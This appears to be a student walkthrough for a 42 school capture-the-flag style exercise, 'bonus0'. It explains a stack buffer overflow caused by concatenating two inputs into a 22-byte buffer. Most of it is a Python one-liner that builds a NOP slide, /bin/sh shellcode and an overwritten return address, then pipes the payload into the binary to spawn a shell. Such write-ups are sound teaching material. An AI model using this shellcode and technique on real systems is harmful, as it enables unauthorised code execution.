# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    walkthrough                                        :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: lgarczyn <lgarczyn@student.42.fr>          +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2019/05/10 22:16:10 by lgarczyn          #+#    #+#              #
#    Updated: 2019/05/10 23:02:39 by lgarczyn         ###   ########.fr        #
#                                                                              #
# **************************************************************************** #

The executable reads 4096 chars twice from stdin,
	then it truncates both results to 20 chars or \n,
	then it concatenates them, with a ' ' between them
	both string concatenated can exceed the 22-sized buffer in main

We write a very large nope slide on the first read, followed by our shellcode.
On the second read, we overflow on the main return pointer.
The second read will be much shorter, and won't overwrite our data.

python -c '
	print "\x90" * 2072 +\
	"\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80" +\
	"\x90" * 2000 +\
	"\x0a"+\
	"AAAAAAAAAAAAAA"+\
	"\x38\xe8\xff\xbf\xff"+\
	"\x0a"
' > /tmp/a

cat /tmp/a - | ./bonus0

